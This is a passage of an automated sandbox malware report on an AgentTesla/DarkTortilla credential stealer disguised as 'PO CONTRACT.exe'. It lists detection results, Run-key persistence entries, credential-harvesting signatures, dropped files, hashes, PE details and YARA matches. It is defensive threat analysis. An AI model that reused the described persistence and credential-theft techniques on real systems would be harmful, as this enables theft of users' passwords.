memory regions 26->76 82 3 other signatures 26->82 42 InstallUtil.exe 2 4 26->42         started        78 Creates multiple autostart registry keys 35->78 80 Creates an autostart registry key pointing to binary in C:\Windows 35->80 54 127.0.0.1 unknown unknown 37->54 signatures11 process12 file13 52 C:\Users\user\AppData\Roaming\...behaviorgraphUIVTme.exe, PE32 42->52 dropped 84 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 42->84 86 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 42->86 88 Tries to steal Mail credentials (via file / registry access) 42->88 90 4 other signatures 42->90 signatures14

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    PO CONTRACT.exe34%VirustotalBrowse
                    PO CONTRACT.exe100%Joe Sandbox ML
                    PO CONTRACT.exe47%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Windows\SysWOW64\SOA.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe0%ReversingLabs
                    C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe0%VirustotalBrowse
                    C:\Windows\SysWOW64\SOA.exe47%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                    C:\Windows\SysWOW64\SOA.exe57%VirustotalBrowse

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://go.mic0%Avira URL Cloudsafe
                    https://account.dyn.com/0%Avira URL Cloudsafe
                    https://account.dyn.com/0%VirustotalBrowse

                    Domains and IPs

                    Contacted Domains

                    No contacted domains info

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://account.dyn.com/PO CONTRACT.exe, 00000000.00000002.36005874246.0000000003F38000.00000004.00000800.00020000.00000000.sdmp, PO CONTRACT.exe, 00000000.00000002.36008654605.0000000005747000.00000004.00000800.00020000.00000000.sdmp, PO CONTRACT.exe, 00000000.00000002.36008654605.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, SOA.exe, 0000000A.00000002.37465940778.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, SOA.exe, 0000000A.00000002.37462492550.0000000003F0F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.40714268783.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://go.micPO CONTRACT.exe, 00000000.00000002.35998232560.0000000001223000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious

                    Private

                    IP
                    127.0.0.1

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1493192
                    Start date and time:2024-08-15 05:07:56 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 16m 34s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                    Run name:Suspected Instruction Hammering
                    Number of analysed new started processes analysed:17
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:PO CONTRACT.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@23/10@0/1
                    EGA Information:
                    • Successful, ratio: 60%
                    HCA Information:
                    • Successful, ratio: 98%
                    • Number of executed functions: 191
                    • Number of non-executed functions: 7
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
                    • Excluded domains from analysis (whitelisted): login.live.com, clients.config.office.net
                    • Execution Graph export aborted for target GUIVTme.exe, PID 2092 because it is empty
                    • Execution Graph export aborted for target GUIVTme.exe, PID 7400 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    05:10:40AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SOA C:\Windows\SysWOW64\SOA.exe
                    05:10:48AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SOA C:\Windows\SysWOW64\SOA.exe
                    05:13:06AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run GUIVTme C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
                    05:13:14AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run GUIVTme C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
                    23:10:34API Interceptor1x Sleep call for process: PO CONTRACT.exe modified
                    23:10:37API Interceptor23x Sleep call for process: PING.EXE modified
                    23:12:29API Interceptor45593x Sleep call for process: SOA.exe modified

                    Joe Sandbox View / Context

                    IPs

                    No context

                    Domains

                    No context

                    ASNs

                    No context

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeimage.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                      ABA NEW ORDER No.2400228341.pdf.exeGet hashmaliciousAsyncRATBrowse
                        09099627362726.exeGet hashmaliciousAgentTeslaBrowse
                          SecuriteInfo.com.Win32.TrojanX-gen.10530.8108.exeGet hashmaliciousDarkTortilla, XWormBrowse
                            719#U665a) HBL# LMSIN2407028 (by SEA) PO# 4500577338, by 1x40' HQ.pdf.scr.exeGet hashmaliciousDarkTortilla, XWormBrowse
                              ISF - SO.4985 KEL-RIO GRANPE HBL#KELRIG2406221.scr.exeGet hashmaliciousDarkTortilla, XWormBrowse
                                F46VBJ6Yvy.exeGet hashmaliciousAgentTeslaBrowse
                                  @#U570b#U5167DEBIT#U5e33#U55ae[#U4e2d#U6587#U672c#U5e63]-OI(K)_20240612161821.scr.exeGet hashmaliciousDarkTortilla, XWormBrowse
                                    SPECIFICATIONS.exeGet hashmaliciousAgentTeslaBrowse
                                      order .exeGet hashmaliciousAgentTeslaBrowse

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GUIVTme.exe.log

                                        Download File
                                        Process:C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
                                        File Type:CSV text
                                        Category:modified
                                        Size (bytes):1089
                                        Entropy (8bit):5.350878246466478
                                        Encrypted:false
                                        SSDEEP:24:ML9E4K1BIKNE4oKeK/KDE4KhKMaKhPKIE4oKnKoZAE4KzDq:MxHK1BIIHoN6YHKh6oPtHoAhAHKz2
                                        MD5:3DF7215F3D1C16DF69CB59389AFAE1DC
                                        SHA1:3B4C5463A2C1C010165A52A6D21CAD1754F8FDF1
                                        SHA-256:5177DF81DE3C4443AAD26F5EE1936056E8DB3CC0C8E39598008FC18F872EBEF6
                                        SHA-512:F3C481491E4613657B6275465357020C78257442D920384A01A345D2C5AC259001BC77BD446BE6F1080C23AB4FCAFF480E186508CCD310FA137D228D14C6945A
                                        Malicious:false
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\827465c25133ff582ff7ddaf85635407\System.ni.dll",0..3,"System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\989d48bf1bfc9e3c8d60c09e2a6a7c0d\System.Configuration.Install.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\374ae62ebbde44ef97c7e898f1fdb21b\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\b863adc9d550931e279ac7e2ee517d1f\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\Nati

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO CONTRACT.exe.log

                                        Download File
                                        Process:C:\Users\user\Desktop\PO CONTRACT.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1216
                                        Entropy (8bit):5.354384827676232
                                        Encrypted:false
                                        SSDEEP:24:MLU84qpE4K1BIKDE4KhKMaKhIE4Kx1qE4qXKIE4oKnKoZAE4KzD1E4j:Mgv2HK1BIYHKh6oIHKx1qHitHoAhAHKF
                                        MD5:7FF110659768EC79159C246BDB73C73E
                                        SHA1:74324029A26FB732C84B53EEE75898DB164773AD
                                        SHA-256:AC007C5DB9F6A64B76C3533B3A45E8539D3FE9D688D560AD5EA2F7226206662A
                                        SHA-512:85AC71E7D41DAA871E35949048A464BB315EC890ECE793FDD3F5FA38043104EDFD5D7E2368A8D3908ACCB08252A8295B303E3BE20EAA9664F1EFA7ED8BB46CAC
                                        Malicious:true
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\827465c25133ff582ff7ddaf85635407\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\374ae62ebbde44ef97c7e898f1fdb21b\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\b863adc9d550931e279ac7e2ee517d1f\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                        C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe

                                        Download File
                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:modified
                                        Size (bytes):42064
                                        Entropy (8bit):6.19564898727408
                                        Encrypted:false
                                        SSDEEP:384:qtpFVLK0MsihB9VKS7xdgl6KJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+RPZTg:GBMs2SqdSZ6Iq8BxTfqWR8h7ukP
                                        MD5:5D4073B2EB6D217C19F2B22F21BF8D57
                                        SHA1:F0209900FBF08D004B886A0B3BA33EA2B0BF9DA8
                                        SHA-256:AC1A3F21FCC88F9CEE7BF51581EAFBA24CC76C924F0821DEB2AFDF1080DDF3D3
                                        SHA-512:9AC94880684933BA3407CDC135ABC3047543436567AF14CD9269C4ADC5A6535DB7B867D6DE0D6238A21B94E69F9890DBB5739155871A624520623A7E56872159
                                        Malicious:false
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                        Joe Sandbox View:
                                        • Filename: image.exe, Detection: malicious, Browse
                                        • Filename: ABA NEW ORDER No.2400228341.pdf.exe, Detection: malicious, Browse
                                        • Filename: 09099627362726.exe, Detection: malicious, Browse
                                        • Filename: SecuriteInfo.com.Win32.TrojanX-gen.10530.8108.exe, Detection: malicious, Browse
                                        • Filename: 719#U665a) HBL# LMSIN2407028 (by SEA) PO# 4500577338, by 1x40' HQ.pdf.scr.exe, Detection: malicious, Browse
                                        • Filename: ISF - SO.4985 KEL-RIO GRANPE HBL#KELRIG2406221.scr.exe, Detection: malicious, Browse
                                        • Filename: F46VBJ6Yvy.exe, Detection: malicious, Browse
                                        • Filename: @#U570b#U5167DEBIT#U5e33#U55ae[#U4e2d#U6587#U672c#U5e63]-OI(K)_20240612161821.scr.exe, Detection: malicious, Browse
                                        • Filename: SPECIFICATIONS.exe, Detection: malicious, Browse
                                        • Filename: order .exe, Detection: malicious, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,>.]..............0..T...........r... ........@.. ....................................`.................................4r..O....................b..PB...........p............................................... ............... ..H............text....R... ...T.................. ..`.rsrc................V..............@..@.reloc...............`..............@..B................hr......H........"..|J..........lm.......o......................................2~.....o....*.r...p(....*VrK..p(....s.........*..0..........(....(....o....o....(....o.... .....T(....o....(....o....o ...o!....4(....o....(....o....o ...o".....(....rm..ps#...o....($........(%....o&....ry..p......%.r...p.%.(.....(....('....((.......o)...('........*.*................"..(*...*..{Q...-...}Q.....(+...(....(,....(+...*"..(-...*..(....*..(.....r...p.(/...o0...s....}T...*....0.. .......~S...-.s

                                        C:\Windows\SysWOW64\SOA.exe

                                        Download File
                                        Process:C:\Windows\SysWOW64\cmd.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):2417152
                                        Entropy (8bit):7.810080552532674
                                        Encrypted:false
                                        SSDEEP:49152:2To7KY/EhaBB4q38SQxZTC7YXepIt8RAF5IVIHo8:2M7j38/+eoAjId8
                                        MD5:E9E7439B7D1098424BFC0BC877B7B2C2
                                        SHA1:5E0660202B12DB946AE396FD8252111D5EAAEA73
                                        SHA-256:7787902137178990EFE8CB5974196101405CAB9C70332FBBD45F546FD4FCB04C
                                        SHA-512:B018A676A4C6540F1C17E17BBA5B08B37F7ABD8E9F30FED266DF8743146746D3B10458D01113D553D23FEDC356A9888700F8C0F5FA6F3EA22EA06F7CF7F9977A
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 47%
                                        • Antivirus: Virustotal, Detection: 57%, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....S.2..................$...........$.. ....%...@.. .......................@%...........`.................................p.$.K.....%...................... %...................................................... ............... ..H............text.....$.. ....$................. ..`.rsrc.........%.......$.............@..@.reloc....... %.......$.............@..B..................$.....H.......4.$.<Z......:.........#.........................................gq....%.F....<.[.&.n...+..&.D..Z.../0.#X_...~.Iq....q^+.....O....[......3..d....[.#.a...2?...AD>q.,....".....u=.t...W...._.I...$</...]9`P..Tm.w.t...l.>W.j./....W?..Q.O.I...C..P#..70.H...9.....81..7R.....s.....-.P;5Y.I.[.....0.}4.ooz....A.....5.x.f .p3../T6......z{=O.t.!..........g..n?d....`UW:.\VP..;A.G..;.=.C.C.CH`o.s.n./...f.P."........Q.$...*.......<.R.....o......<...j.L.g..e.'...

                                        C:\Windows\SysWOW64\SOA.exe:Zone.Identifier

                                        Download File
                                        Process:C:\Windows\SysWOW64\cmd.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:modified
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview:[ZoneTransfer]....ZoneId=0

                                        \Device\ConDrv

                                        Download File
                                        Process:C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2017
                                        Entropy (8bit):4.659840607039457
                                        Encrypted:false
                                        SSDEEP:48:zK4QsD4ql0+1AcJRy0EJP64gFljVlWo3ggxUnQK2qmBvgw1+5:zKgDEcTytNe3Wo3uQVBIe+5
                                        MD5:3BF802DEB390033F9A89736CBA5BFAFF
                                        SHA1:25A7177A92E0283B99C85538C4754A12AC8AD197
                                        SHA-256:5202EB464D6118AC60F72E89FBAAACF1FB8CF6A232F98F47F88D0E7B2F3AFDB3
                                        SHA-512:EB4F440D28ECD5834FD347F43D4828CA9FEE900FF003764DD1D18B95E0B84E414EAECF70D75236A1463366A189BC5CBA21613F79B5707BF7BDB3CEA312CCE4F7
                                        Malicious:false
                                        Preview:Microsoft (R) .NET Framework Installation utility Version 4.8.4084.0..Copyright (C) Microsoft Corporation. All rights reserved.....Usage: InstallUtil [/u | /uninstall] [option [...]] assembly [[option [...]] assembly] [...]]....InstallUtil executes the installers in each given assembly...If the /u or /uninstall switch is specified, it uninstalls..the assemblies, otherwise it installs them. Unlike other..options, /u applies to all assemblies, regardless of where it..appears on the command line.....Installation is done in a transactioned way: If one of the..assemblies fails to install, the installations of all other..assemblies are rolled back. Uninstall is not transactioned.....Options take the form /switch=[value]. Any option that occurs..before the name of an assembly will apply to that assembly's..installation. Options are cumulative but overridable - options..specified for one assembly will apply to the next as well unless..the option is specified with a new value. The default for

                                        \Device\Null

                                        Download File
                                        Process:C:\Windows\SysWOW64\PING.EXE
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2342
                                        Entropy (8bit):4.725019911843614
                                        Encrypted:false
                                        SSDEEP:12:PKMRJpTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTL:/Q/5AokItULVDv
                                        MD5:7A559C3B1494D896C79D9CA23EA8A48F
                                        SHA1:93713262CF69081EF835824234A91FF57910C861
                                        SHA-256:8FFB12299478980F44C9E70949F03031BBCA244270E08C429D39807601AE9433
                                        SHA-512:CC78AF792F52DB67355BE5A5E58D6813E460744CC1B6E3BD4B90B17C6EB919A252BF56184F96F7CF02D72BDA235BC6C19B52BC58CFC17195B37A0F5828201609
                                        Malicious:false
                                        Preview:..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: byt

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):7.810080552532674
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        • DOS Executable Generic (2002/1) 0.01%
                                        File name:PO CONTRACT.exe
                                        File size:2'417'152 bytes
                                        MD5:e9e7439b7d1098424bfc0bc877b7b2c2
                                        SHA1:5e0660202b12db946ae396fd8252111d5eaaea73
                                        SHA256:7787902137178990efe8cb5974196101405cab9c70332fbbd45f546fd4fcb04c
                                        SHA512:b018a676a4c6540f1c17e17bba5b08b37f7abd8e9f30fed266df8743146746d3b10458d01113d553d23fedc356a9888700f8c0f5fa6f3ea22ea06f7cf7f9977a
                                        SSDEEP:49152:2To7KY/EhaBB4q38SQxZTC7YXepIt8RAF5IVIHo8:2M7j38/+eoAjId8
                                        TLSH:BEB5338A53C7996ED52CCDB2002575D8D371E0A3411BEB4CA5DC13F94B8BBEBE726092
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....S.2..................$...........$.. ....%...@.. .......................@%...........`................................

                                        File Icon

                                        Icon Hash:90cececece8e8eb0

                                        Static PE Info

                                        General

                                        Entrypoint:0x64f9be
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x32FF53EB [Mon Feb 10 16:59:23 1997 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                        Entrypoint Preview

                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x24f9700x4b.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x2500000x3e4.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x2520000xc.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000x24d9c40x24da00acefc9d9a0d1714802bfc80ed090b6f8unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rsrc0x2500000x3e40x4004d20dda505fe83dde0e0103488936fb8False0.4267578125data3.413996474439628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0x2520000xc0x200ae3fe773ece0b7c6137213b44fbc3c07False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_VERSION0x2500580x38cPGP symmetric key encrypted data - Plaintext or unencrypted data0.44823788546255505

                                        Imports

                                        DLLImport
                                        mscoree.dll_CorExeMain

                                        Network Behavior

                                        No network behavior found

                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:23:10:01
                                        Start date:14/08/2024
                                        Path:C:\Users\user\Desktop\PO CONTRACT.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\PO CONTRACT.exe"
                                        Imagebase:0x7e0000
                                        File size:2'417'152 bytes
                                        MD5 hash:E9E7439B7D1098424BFC0BC877B7B2C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.36008654605.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.36008654605.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.36008654605.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.36005874246.0000000003F38000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.36005874246.0000000003F38000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.36005874246.0000000003F38000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
